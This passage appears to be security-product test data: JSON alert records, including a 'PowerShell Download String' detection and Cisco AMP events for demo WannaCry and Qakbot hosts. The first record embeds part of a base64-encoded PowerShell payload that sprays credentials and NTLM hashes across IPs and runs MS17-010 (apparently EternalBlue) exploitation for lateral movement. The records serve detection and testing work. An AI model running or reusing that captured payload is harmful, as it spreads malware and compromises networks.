AaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 